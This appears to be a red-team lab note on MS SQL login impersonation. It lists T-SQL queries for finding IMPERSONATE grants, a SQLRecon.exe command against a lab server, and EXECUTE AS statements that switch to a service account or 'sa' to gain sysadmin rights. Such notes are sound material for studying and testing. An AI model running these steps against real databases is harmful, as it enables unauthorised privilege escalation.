MS SQL Impersonation

Discover accounts to impersonate

SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'

101 | SERVER_PRINCIPAL | 267 | 0 | 268 | 267 | IM | IMPERSONATE | G | GRANT |

the grantee_principal_id, 268, is allowed to impersonate the grantor_principal_id, 267

Look up ID's

SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals

Here, we see that 267 is DEV\mssql_svc and 268 is DEV\Domain Users

Easier way

SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate

Impersonate

EXECUTE AS login = 'DEV\mssql_svc'; SELECT SYSTEM_USER

EXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin')

EXECUTE AS login = 'sa'

SQLRecon modules can also be run in "impersonation mode"

Last updated 2 years ago

hashtagDiscover accounts to impersonate

hashtagLook up ID's

hashtagEasier way

hashtagImpersonate

Discover accounts to impersonate

Look up ID's

Easier way

Impersonate